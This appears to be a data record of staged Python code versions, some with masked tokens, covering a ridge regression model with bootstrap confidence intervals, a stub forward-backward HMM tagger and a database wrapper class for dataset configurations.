MSE, R2Score\nimport numpy as np\nimport scipy.stats as st\n\n\nclass RidgeLinearModel:\n covariance_matrix = None\n covariance_matrix_updated = False\n beta = None\n var_vector = None\n var_vector_updated = False\n CIbeta = None\n CIbeta_updated = False\n x1 = None\n x2 = None\n y = None\n y_tilde = None\n y_tilde_updated = False\n\n def __init__(this, lmb, k):\n this.lmb = lmb\n this.k = k\n\n def fit(this, x1, x2, y):\n this.x1 = x1\n this.x2 = x2\n this.y = y\n m = x1.shape[0]\n n = SumOneToN(this.k + 1)\n this.X = np.ones((m, n))\n for i in range(m):\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n this.X[i][SumOneToN(p + 1) + j] *= x1[i] ** (p + 1 - j\n ) * x2[i] ** j\n this.beta = np.linalg.pinv(this.X.T.dot(this.X) + this.lmb * np.\n identity(n)).dot(this.X.T).dot(y)\n this.set_updated_to_false()\n\n def predict(this, x1, x2):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y = np.ones(x1.shape) * this.beta[0]\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n y += this.beta[SumOneToN(p + 1) + j] * x1 ** (p + 1 - j\n ) * x2 ** j\n return y\n\n def get_RSS(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return RSS(y, this.y_tilde)\n\n def get_MSE(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return MSE(y, y_tilde)\n\n def get_R2Score(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return R2Score(y, y_tilde)\n\n def get_variance_of_betas(this, B=20):\n m = len(this.x1)\n n = SumOneToN(this.k + 1)\n betasamples = np.zeros((n, B))\n for b in range(B):\n c = np.random.choice(len(this.x1), len(this.x1))\n s_x1 = this.x1[c]\n s_x2 = this.x2[c]\n s_y = this.y[c]\n if len(s_y.shape) == 1:\n s_y = np.expand_dims(this.y[c], axis=1)\n s_X = np.ones((m, n))\n for i in range(m):\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n s_X[i][SumOneToN(p + 1) + j] *= s_x1[i] ** (p + 1 - j\n ) * s_x2[i] ** j\n betasamples[:, b] = np.linalg.pinv(s_X.T.dot(s_X) + this.lmb *\n np.identity(n)).dot(s_X.T).dot(s_y)[:, 0]\n betameans = betasamples.sum(axis=1, keepdims=True) / B\n this.var_vector = np.sum((betasamples - betameans) ** 2, axis=1) / B\n return this.var_vector\n\n def get_CI_of_beta(this, percentile=0.95):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n if not this.CIbeta_updated:\n stdcoeff = st.norm.ppf((1 - percentile) / 2)\n this.CI_beta = np.zeros((len(this.beta), 2))\n for i in range(len(this.beta)):\n this.CI_beta[i][0] = this.beta[i] + stdcoeff * np.sqrt(this\n .var_vector[i])\n this.CI_beta[i][1] = this.beta[i] - stdcoeff * np.sqrt(this\n .var_vector[i])\n this.CIbeta_updated = True\n return this.CI_beta\n\n def set_updated_to_false(this):\n covariance_matrix_updated = False\n var_vector_updated = False\n y_tilde_updated = False\n CIbeta_updated = False\n", "step-5": "from utilities import SumOneToN, RSS, MSE, R2Score\nimport numpy as np\nimport scipy.stats as st\n\nclass RidgeLinearModel:\n covariance_matrix = None # covariance matrix of the model coefficients\n covariance_matrix_updated = False\n beta = None # coefficients of the modelfunction\n var_vector = None\n var_vector_updated = False\n CIbeta = None # confidence interval of betas\n CIbeta_updated = False\n x1 = None # first predictor of sampledata\n x2 = None # second predictor of sampledata\n y = None # responses of sampledata\n y_tilde = None # model predictions for x\n y_tilde_updated = False\n\n\n def __init__(this, lmb, k):\n this.lmb = lmb # set lambda of model\n this.k = k # set order of polynomial\n\n\n # This function fits the model to the the sample data\n # using Ridge regression\n #\n # @x: array containing predictors\n # @y: array containing responses\n # @k: the degree of the polynomial to be fitted to the sample data\n # @lmb: lambda, determines the emphasize on minimizing the variance\n # of the model\n #\n def fit(this, x1, x2, y):\n # store x ands y for later computations\n this.x1 = x1\n this.x2 = x2\n this.y = y\n\n # calculate the dimensions of the design matrix\n m = x1.shape[0]\n n = SumOneToN(this.k + 1)\n\n # allocate design matrix\n this.X = np.ones((m, n))\n\n # compute values of design matrix\n for i in range(m): # vectoriser denne løkka\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n this.X[i][SumOneToN(p + 1) + j] *= x1[i]**(p\n + 1 - j)*x2[i]**j\n\n # compute linear regression coefficients\n this.beta = np.linalg.pinv(this.X.T.dot(this.X) +\n this.lmb*np.identity(n)).dot(this.X.T).dot(y)\n\n # stored statistical parameters are no longer valid\n this.set_updated_to_false()\n\n\n # Predicts and returns the responses of the predictors with\n # the fitted model if the model is fitted\n #\n # @x1: Columnvector containing the first predictor values\n # @x2: Columnvector containing the second predictor values\n #\n def predict(this, x1, x2):\n if this.beta is None:\n print(\"Error: Model is not fitted.\")\n return None\n else:\n # allocate meshgrid filled with constant term\n y = np.ones(x1.shape)*this.beta[0]\n\n # compute function values\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n y += this.beta[SumOneToN(p + 1)\n + j]*x1**(p+1-j)*x2**j\n\n return y\n\n\n # Returns the residuals of the model squared and summed\n def get_RSS(this, x1, x2, y):\n if this.beta is None:\n print(\"Error: Model is not fitted.\")\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return RSS(y, this.y_tilde)\n\n\n # Returns the mean squared error of the model\n # given the sample data (x1, x2, y)\n #\n # @x1: vector of first predictor\n # @x2: vector of second predictor\n # @y: vector of responses\n #\n def get_MSE(this, x1, x2, y):\n if this.beta is None:\n print(\"Error: Model is not fitted.\")\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return MSE(y, y_tilde)\n\n\n # Returns the R2 score of the model\n def get_R2Score(this, x1, x2, y):\n if this.beta is None:\n print(\"Error: Model is not fitted.\")\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return R2Score(y, y_tilde)\n\n\n # Computes the sample variance of the coefficients of the model\n # @B: The number of samples used\n def get_variance_of_betas(this, B=20):\n m = len(this.x1)\n n = SumOneToN(this.k + 1)\n betasamples = np.zeros((n, B))\n\n for b in range(B):\n # create bootstrapsample\n c = np.random.choice(len(this.x1), len(this.x1))\n s_x1 = this.x1[c]\n s_x2 = this.x2[c]\n s_y = this.y[c]\n # Next line fixes if y is one-dimensional\n if (len(s_y.shape)) == 1:\n s_y = np.expand_dims(this.y[c], axis=1)\n\n # allocate design matrix\n s_X = np.ones((m, n))\n\n # compute values of design matrix\n for i in range(m): # vectoriser denne løkka\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n s_X[i][SumOneToN(p + 1) + j] *= s_x1[i]**(p\n + 1 - j)*s_x2[i]**j\n\n betasamples[:,b] = np.linalg.pinv(s_X.T.dot(s_X) +\n this.lmb*np.identity(n)).dot(s_X.T).dot(s_y)[:, 0]\n\n betameans = betasamples.sum(axis=1, keepdims=True)/B\n\n # Compute variance vector\n this.var_vector = np.sum((betasamples - betameans)**2, axis=1)/B\n\n return this.var_vector\n\n\n # Returns the confidence interval of the betas\n def get_CI_of_beta(this, percentile=.95):\n if this.beta is None:\n print(\"Error: Model is not fitted.\")\n return None\n else:\n if not this.CIbeta_updated:\n\n # stdcoeff is the z-score to the two-sided confidence interval\n stdcoeff = st.norm.ppf((1-percentile)/2)\n this.CI_beta = np.zeros((len(this.beta), 2))\n for i in range(len(this.beta)):\n this.CI_beta[i][0] = this.beta[i] + stdcoeff*np.sqrt(this.var_vector[i])\n this.CI_beta[i][1] = this.beta[i] - stdcoeff*np.sqrt(this.var_vector[i])\n\n this.CIbeta_updated = True\n # CI_beta returns a nx2 matrix with each row\n # representing the confidence interval to the corresponding beta\n return this.CI_beta\n\n\n def set_updated_to_false(this):\n covariance_matrix_updated = False\n var_vector_updated = False\n y_tilde_updated = False\n CIbeta_updated = False\n", "step-ids": [ 6, 10, 11, 12, 13 ] }
[ 6, 10, 11, 12, 13 ]
<|reserved_special_token_0|> class ForwardBackward(BaseTagger): <|reserved_special_token_0|> <|reserved_special_token_0|> def probabilities(self): """ Return the probabilities of a hidden state sequence given observed output sequence :return: """ raise NotImplementedError <|reserved_special_token_0|> def tag(self): """ alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda model """ self.alpha = self.prob_given_state() raise NotImplementedError <|reserved_special_token_1|> <|reserved_special_token_0|> class ForwardBackward(BaseTagger): <|reserved_special_token_0|> <|reserved_special_token_0|> def probabilities(self): """ Return the probabilities of a hidden state sequence given observed output sequence :return: """ raise NotImplementedError def prob_given_state(self, start=1, end=len(self.T)): """ Return the probabilities of output from "start" to "end" given current (hidden) state :param start: start of observing time :param end: end of observing time :return: probabilities. *********************** * return format * *********************** """ raise NotImplementedError def tag(self): """ alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda model """ self.alpha = self.prob_given_state() raise NotImplementedError <|reserved_special_token_1|> <|reserved_special_token_0|> class ForwardBackward(BaseTagger): <|reserved_special_token_0|> def __init__(self): """ Constructor """ self.path_to_file = check_for_terminal_argument() BaseTagger.__init__(self) raise NotImplementedError def probabilities(self): """ Return the probabilities of a hidden state sequence given observed output sequence :return: """ raise NotImplementedError def prob_given_state(self, start=1, end=len(self.T)): """ Return the probabilities of output from "start" to "end" given current (hidden) state :param start: start of observing time :param end: end of observing time :return: probabilities. *********************** * return format * *********************** """ raise NotImplementedError def tag(self): """ alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda model """ self.alpha = self.prob_given_state() raise NotImplementedError <|reserved_special_token_1|> import time from numpy import empty from src.utils import normalize_input_sentence, evaluate, add_begin_and_trailing_tag, check_for_terminal_argument from classes.BaseTagger import BaseTagger from src.CONSTANT import POS_TAG_KEYNAME, WORD_KEYNAME, TRUETAG_KEYNAME, DEFAULT_TRAINING_FILENAME import sys import os class ForwardBackward(BaseTagger): """ For Learning: Calculate probability of an observation sequence given a HMM: P(O | lambda) """ def __init__(self): """ Constructor """ self.path_to_file = check_for_terminal_argument() BaseTagger.__init__(self) raise NotImplementedError def probabilities(self): """ Return the probabilities of a hidden state sequence given observed output sequence :return: """ raise NotImplementedError def prob_given_state(self, start=1, end=len(self.T)): """ Return the probabilities of output from "start" to "end" given current (hidden) state :param start: start of observing time :param end: end of observing time :return: probabilities. *********************** * return format * *********************** """ raise NotImplementedError def tag(self): """ alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda model """ self.alpha = self.prob_given_state() raise NotImplementedError <|reserved_special_token_1|> import time from numpy import empty from src.utils import normalize_input_sentence, evaluate, add_begin_and_trailing_tag, check_for_terminal_argument from classes.BaseTagger import BaseTagger from src.CONSTANT import POS_TAG_KEYNAME, WORD_KEYNAME, TRUETAG_KEYNAME, DEFAULT_TRAINING_FILENAME import sys import os # TODO check all document class ForwardBackward(BaseTagger): """ For Learning: Calculate probability of an observation sequence given a HMM: P(O | lambda) """ def __init__(self): """ Constructor """ # TODO Need to seperate input reading into whether a class method or static function self.path_to_file = check_for_terminal_argument() BaseTagger.__init__(self) raise NotImplementedError def probabilities(self): """ Return the probabilities of a hidden state sequence given observed output sequence :return: """ raise NotImplementedError def prob_given_state(self, start=1, end=len(self.T)): # , start, end): """ Return the probabilities of output from "start" to "end" given current (hidden) state :param start: start of observing time :param end: end of observing time :return: probabilities. *********************** * return format * *********************** """ # for state_index in range(len(self.tagset)): # self.alpha[1][state_index] = 0 raise NotImplementedError def tag(self): """ alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda model """ self.alpha = self.prob_given_state() raise NotImplementedError
flexible
{ "blob_id": "8cc0314d48f81ceead863245443548297e8188f8", "index": 9610, "step-1": "<mask token>\n\n\nclass ForwardBackward(BaseTagger):\n <mask token>\n <mask token>\n\n def probabilities(self):\n \"\"\"\n Return the probabilities of a hidden state sequence given observed output sequence\n :return:\n \"\"\"\n raise NotImplementedError\n <mask token>\n\n def tag(self):\n \"\"\"\n alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda\n model\n \"\"\"\n self.alpha = self.prob_given_state()\n raise NotImplementedError\n", "step-2": "<mask token>\n\n\nclass ForwardBackward(BaseTagger):\n <mask token>\n <mask token>\n\n def probabilities(self):\n \"\"\"\n Return the probabilities of a hidden state sequence given observed output sequence\n :return:\n \"\"\"\n raise NotImplementedError\n\n def prob_given_state(self, start=1, end=len(self.T)):\n \"\"\"\n Return the probabilities of output from \"start\" to \"end\" given current (hidden) state\n :param start: start of observing time\n :param end: end of observing time\n :return: probabilities.\n ***********************\n * return format *\n ***********************\n \"\"\"\n raise NotImplementedError\n\n def tag(self):\n \"\"\"\n alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda\n model\n \"\"\"\n self.alpha = self.prob_given_state()\n raise NotImplementedError\n", "step-3": "<mask token>\n\n\nclass ForwardBackward(BaseTagger):\n <mask token>\n\n def __init__(self):\n \"\"\"\n Constructor\n \"\"\"\n self.path_to_file = check_for_terminal_argument()\n BaseTagger.__init__(self)\n raise NotImplementedError\n\n def probabilities(self):\n \"\"\"\n Return the probabilities of a hidden state sequence given observed output sequence\n :return:\n \"\"\"\n raise NotImplementedError\n\n def prob_given_state(self, start=1, end=len(self.T)):\n \"\"\"\n Return the probabilities of output from \"start\" to \"end\" given current (hidden) state\n :param start: start of observing time\n :param end: end of observing time\n :return: probabilities.\n ***********************\n * return format *\n ***********************\n \"\"\"\n raise NotImplementedError\n\n def tag(self):\n \"\"\"\n alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda\n model\n \"\"\"\n self.alpha = self.prob_given_state()\n raise NotImplementedError\n", "step-4": "import time\nfrom numpy import empty\nfrom src.utils import normalize_input_sentence, evaluate, add_begin_and_trailing_tag, check_for_terminal_argument\nfrom classes.BaseTagger import BaseTagger\nfrom src.CONSTANT import POS_TAG_KEYNAME, WORD_KEYNAME, TRUETAG_KEYNAME, DEFAULT_TRAINING_FILENAME\nimport sys\nimport os\n\n\nclass ForwardBackward(BaseTagger):\n \"\"\"\n For Learning: Calculate probability of an observation sequence given a HMM: P(O | lambda)\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Constructor\n \"\"\"\n self.path_to_file = check_for_terminal_argument()\n BaseTagger.__init__(self)\n raise NotImplementedError\n\n def probabilities(self):\n \"\"\"\n Return the probabilities of a hidden state sequence given observed output sequence\n :return:\n \"\"\"\n raise NotImplementedError\n\n def prob_given_state(self, start=1, end=len(self.T)):\n \"\"\"\n Return the probabilities of output from \"start\" to \"end\" given current (hidden) state\n :param start: start of observing time\n :param end: end of observing time\n :return: probabilities.\n ***********************\n * return format *\n ***********************\n \"\"\"\n raise NotImplementedError\n\n def tag(self):\n \"\"\"\n alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda\n model\n \"\"\"\n self.alpha = self.prob_given_state()\n raise NotImplementedError\n", "step-5": "import time\n\nfrom numpy import empty\nfrom src.utils import normalize_input_sentence, evaluate, add_begin_and_trailing_tag, check_for_terminal_argument\nfrom classes.BaseTagger import BaseTagger\nfrom src.CONSTANT import POS_TAG_KEYNAME, WORD_KEYNAME, TRUETAG_KEYNAME, DEFAULT_TRAINING_FILENAME\nimport sys\nimport os\n\n\n# TODO check all document\n\nclass ForwardBackward(BaseTagger):\n \"\"\"\n For Learning: Calculate probability of an observation sequence given a HMM: P(O | lambda)\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Constructor\n \"\"\"\n # TODO Need to seperate input reading into whether a class method or static function\n\n self.path_to_file = check_for_terminal_argument()\n BaseTagger.__init__(self)\n raise NotImplementedError\n\n def probabilities(self):\n \"\"\"\n Return the probabilities of a hidden state sequence given observed output sequence\n :return:\n \"\"\"\n raise NotImplementedError\n\n def prob_given_state(self, start=1, end=len(self.T)): # , start, end):\n \"\"\"\n Return the probabilities of output from \"start\" to \"end\" given current (hidden) state\n :param start: start of observing time\n :param end: end of observing time\n :return: probabilities.\n ***********************\n * return format *\n ***********************\n \"\"\"\n\n # for state_index in range(len(self.tagset)):\n # self.alpha[1][state_index] = 0\n\n raise NotImplementedError\n\n def tag(self):\n \"\"\"\n alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda\n model\n \"\"\"\n self.alpha = self.prob_given_state()\n\n raise NotImplementedError\n", "step-ids": [ 3, 4, 5, 7, 8 ] }
[ 3, 4, 5, 7, 8 ]
<|reserved_special_token_0|> class Dataset_conf_ds(object): <|reserved_special_token_0|> def __init__(self, id_ds_conf_ds=-1, value_configuration=-1, FK_id_configuration_DCT_DCD=-1, FK_id_dataset_DS_DCD=-1): """ Constructor of the DDI_interactionDB object. All the parameters have a default value :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown :param value_configuration: value of the bins - -1 if unknown :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS) :type id_ds_conf_ds: int - not required :type value_configuration: int - not required :type FK_id_configuration_DCT_DCD: text (date format) - required :type FK_id_dataset_DS_DCD: int - required """ self.id_ds_conf_ds = id_ds_conf_ds self.value_configuration = value_configuration self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Dataset_conf_ds(object): <|reserved_special_token_0|> def __init__(self, id_ds_conf_ds=-1, value_configuration=-1, FK_id_configuration_DCT_DCD=-1, FK_id_dataset_DS_DCD=-1): """ Constructor of the DDI_interactionDB object. All the parameters have a default value :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown :param value_configuration: value of the bins - -1 if unknown :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS) :type id_ds_conf_ds: int - not required :type value_configuration: int - not required :type FK_id_configuration_DCT_DCD: text (date format) - required :type FK_id_dataset_DS_DCD: int - required """ self.id_ds_conf_ds = id_ds_conf_ds self.value_configuration = value_configuration self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD <|reserved_special_token_0|> def create_ds_config_ds(self): """ Insert a dataset configuration of Dataset in the database return it id The ds_conf_ds contain: - value of the creation - FK of the configuration - FK of the dataset :return: id Dataset_conf_ds :rtype int """ sqlObj = _DS_config_DS_SQL() value_id_ds_conf_ds = sqlObj.insert_DS_conf_DS_return_id_if_not_exists( self.value_configuration, self.FK_id_configuration_DCT_DCD, self.FK_id_dataset_DS_DCD) self.id_ds_conf_ds = value_id_ds_conf_ds return value_id_ds_conf_ds <|reserved_special_token_1|> <|reserved_special_token_0|> class Dataset_conf_ds(object): """ This class treat the datasets configuration connection tables object has it exists in DATASET_CONF_DS table database NOTE: It consistes on a conection class (N to N) to know for each dataset with a given configuration By default, all FK are in the lasts positions in the parameters declaration """ def __init__(self, id_ds_conf_ds=-1, value_configuration=-1, FK_id_configuration_DCT_DCD=-1, FK_id_dataset_DS_DCD=-1): """ Constructor of the DDI_interactionDB object. All the parameters have a default value :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown :param value_configuration: value of the bins - -1 if unknown :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS) :type id_ds_conf_ds: int - not required :type value_configuration: int - not required :type FK_id_configuration_DCT_DCD: text (date format) - required :type FK_id_dataset_DS_DCD: int - required """ self.id_ds_conf_ds = id_ds_conf_ds self.value_configuration = value_configuration self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD def get_all_datasets_conf_ds(): """ return an array with all the configurations of datasets in the database :return: array of datasets configurations :rtype: array(DDI_interaction_DB) """ listOfDatasetDSConfig = [] sqlObj = _DS_config_DS_SQL() results = sqlObj.select_all_DDI_DB() for element in results: listOfDatasetDSConfig.append(Dataset_conf_ds(element[0], element[1], element[2], element[3])) return listOfDatasetDSConfig def create_ds_config_ds(self): """ Insert a dataset configuration of Dataset in the database return it id The ds_conf_ds contain: - value of the creation - FK of the configuration - FK of the dataset :return: id Dataset_conf_ds :rtype int """ sqlObj = _DS_config_DS_SQL() value_id_ds_conf_ds = sqlObj.insert_DS_conf_DS_return_id_if_not_exists( self.value_configuration, self.FK_id_configuration_DCT_DCD, self.FK_id_dataset_DS_DCD) self.id_ds_conf_ds = value_id_ds_conf_ds return value_id_ds_conf_ds <|reserved_special_token_1|> <|reserved_special_token_0|> from SQL_obj_new.Dataset_config_dataset_new_sql import _DS_config_DS_SQL class Dataset_conf_ds(object): """ This class treat the datasets configuration connection tables object has it exists in DATASET_CONF_DS table database NOTE: It consistes on a conection class (N to N) to know for each dataset with a given configuration By default, all FK are in the lasts positions in the parameters declaration """ def __init__(self, id_ds_conf_ds=-1, value_configuration=-1, FK_id_configuration_DCT_DCD=-1, FK_id_dataset_DS_DCD=-1): """ Constructor of the DDI_interactionDB object. All the parameters have a default value :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown :param value_configuration: value of the bins - -1 if unknown :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS) :type id_ds_conf_ds: int - not required :type value_configuration: int - not required :type FK_id_configuration_DCT_DCD: text (date format) - required :type FK_id_dataset_DS_DCD: int - required """ self.id_ds_conf_ds = id_ds_conf_ds self.value_configuration = value_configuration self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD def get_all_datasets_conf_ds(): """ return an array with all the configurations of datasets in the database :return: array of datasets configurations :rtype: array(DDI_interaction_DB) """ listOfDatasetDSConfig = [] sqlObj = _DS_config_DS_SQL() results = sqlObj.select_all_DDI_DB() for element in results: listOfDatasetDSConfig.append(Dataset_conf_ds(element[0], element[1], element[2], element[3])) return listOfDatasetDSConfig def create_ds_config_ds(self): """ Insert a dataset configuration of Dataset in the database return it id The ds_conf_ds contain: - value of the creation - FK of the configuration - FK of the dataset :return: id Dataset_conf_ds :rtype int """ sqlObj = _DS_config_DS_SQL() value_id_ds_conf_ds = sqlObj.insert_DS_conf_DS_return_id_if_not_exists( self.value_configuration, self.FK_id_configuration_DCT_DCD, self.FK_id_dataset_DS_DCD) self.id_ds_conf_ds = value_id_ds_conf_ds return value_id_ds_conf_ds <|reserved_special_token_1|> # -*- coding: utf-8 -*- """ Created on Tue Mai 15 11:34:22 2018 @author: Diogo Leite """ from SQL_obj_new.Dataset_config_dataset_new_sql import _DS_config_DS_SQL class Dataset_conf_ds(object): """ This class treat the datasets configuration connection tables object has it exists in DATASET_CONF_DS table database NOTE: It consistes on a conection class (N to N) to know for each dataset with a given configuration By default, all FK are in the lasts positions in the parameters declaration """ def __init__(self, id_ds_conf_ds = -1, value_configuration = -1, FK_id_configuration_DCT_DCD = -1, FK_id_dataset_DS_DCD = -1): """ Constructor of the DDI_interactionDB object. All the parameters have a default value :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown :param value_configuration: value of the bins - -1 if unknown :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS) :type id_ds_conf_ds: int - not required :type value_configuration: int - not required :type FK_id_configuration_DCT_DCD: text (date format) - required :type FK_id_dataset_DS_DCD: int - required """ self.id_ds_conf_ds = id_ds_conf_ds self.value_configuration = value_configuration self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD def get_all_datasets_conf_ds(): """ return an array with all the configurations of datasets in the database :return: array of datasets configurations :rtype: array(DDI_interaction_DB) """ listOfDatasetDSConfig = [] sqlObj = _DS_config_DS_SQL() results = sqlObj.select_all_DDI_DB() for element in results: listOfDatasetDSConfig.append(Dataset_conf_ds(element[0], element[1], element[2], element[3])) return listOfDatasetDSConfig def create_ds_config_ds(self): """ Insert a dataset configuration of Dataset in the database return it id The ds_conf_ds contain: - value of the creation - FK of the configuration - FK of the dataset :return: id Dataset_conf_ds :rtype int """ sqlObj = _DS_config_DS_SQL() value_id_ds_conf_ds = sqlObj.insert_DS_conf_DS_return_id_if_not_exists(self.value_configuration, self.FK_id_configuration_DCT_DCD, self.FK_id_dataset_DS_DCD) self.id_ds_conf_ds = value_id_ds_conf_ds return value_id_ds_conf_ds
flexible
{ "blob_id": "76d2c3f74e8fae160396b4015ccec478dba97b87", "index": 7422, "step-1": "<mask token>\n\n\nclass Dataset_conf_ds(object):\n <mask token>\n\n def __init__(self, id_ds_conf_ds=-1, value_configuration=-1,\n FK_id_configuration_DCT_DCD=-1, FK_id_dataset_DS_DCD=-1):\n \"\"\"\n Constructor of the DDI_interactionDB object. All the parameters have a default value\n\n :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown\n :param value_configuration: value of the bins - -1 if unknown\n :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown\n :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS)\n\n :type id_ds_conf_ds: int - not required\n :type value_configuration: int - not required\n :type FK_id_configuration_DCT_DCD: text (date format) - required \n :type FK_id_dataset_DS_DCD: int - required \n \"\"\"\n self.id_ds_conf_ds = id_ds_conf_ds\n self.value_configuration = value_configuration\n self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD\n self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass Dataset_conf_ds(object):\n <mask token>\n\n def __init__(self, id_ds_conf_ds=-1, value_configuration=-1,\n FK_id_configuration_DCT_DCD=-1, FK_id_dataset_DS_DCD=-1):\n \"\"\"\n Constructor of the DDI_interactionDB object. All the parameters have a default value\n\n :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown\n :param value_configuration: value of the bins - -1 if unknown\n :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown\n :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS)\n\n :type id_ds_conf_ds: int - not required\n :type value_configuration: int - not required\n :type FK_id_configuration_DCT_DCD: text (date format) - required \n :type FK_id_dataset_DS_DCD: int - required \n \"\"\"\n self.id_ds_conf_ds = id_ds_conf_ds\n self.value_configuration = value_configuration\n self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD\n self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD\n <mask token>\n\n def create_ds_config_ds(self):\n \"\"\"\n Insert a dataset configuration of Dataset in the database return it id\n The ds_conf_ds contain:\n - value of the creation\n - FK of the configuration\n - FK of the dataset\n\n :return: id Dataset_conf_ds\n :rtype int\n \"\"\"\n sqlObj = _DS_config_DS_SQL()\n value_id_ds_conf_ds = sqlObj.insert_DS_conf_DS_return_id_if_not_exists(\n self.value_configuration, self.FK_id_configuration_DCT_DCD,\n self.FK_id_dataset_DS_DCD)\n self.id_ds_conf_ds = value_id_ds_conf_ds\n return value_id_ds_conf_ds\n", "step-3": "<mask token>\n\n\nclass Dataset_conf_ds(object):\n \"\"\"\n This class treat the datasets configuration connection tables object has it exists in DATASET_CONF_DS table database\n\n NOTE: It consistes on a conection class (N to N) to know for each dataset with a given configuration\n\n By default, all FK are in the lasts positions in the parameters declaration\n \"\"\"\n\n def __init__(self, id_ds_conf_ds=-1, value_configuration=-1,\n FK_id_configuration_DCT_DCD=-1, FK_id_dataset_DS_DCD=-1):\n \"\"\"\n Constructor of the DDI_interactionDB object. All the parameters have a default value\n\n :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown\n :param value_configuration: value of the bins - -1 if unknown\n :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown\n :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS)\n\n :type id_ds_conf_ds: int - not required\n :type value_configuration: int - not required\n :type FK_id_configuration_DCT_DCD: text (date format) - required \n :type FK_id_dataset_DS_DCD: int - required \n \"\"\"\n self.id_ds_conf_ds = id_ds_conf_ds\n self.value_configuration = value_configuration\n self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD\n self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD\n\n def get_all_datasets_conf_ds():\n \"\"\"\n return an array with all the configurations of datasets in the database\n\n :return: array of datasets configurations\n :rtype: array(DDI_interaction_DB)\n \"\"\"\n listOfDatasetDSConfig = []\n sqlObj = _DS_config_DS_SQL()\n results = sqlObj.select_all_DDI_DB()\n for element in results:\n listOfDatasetDSConfig.append(Dataset_conf_ds(element[0],\n element[1], element[2], element[3]))\n return listOfDatasetDSConfig\n\n def create_ds_config_ds(self):\n \"\"\"\n Insert a dataset configuration of Dataset in the database return it id\n The ds_conf_ds contain:\n - value of the creation\n - FK of the configuration\n - 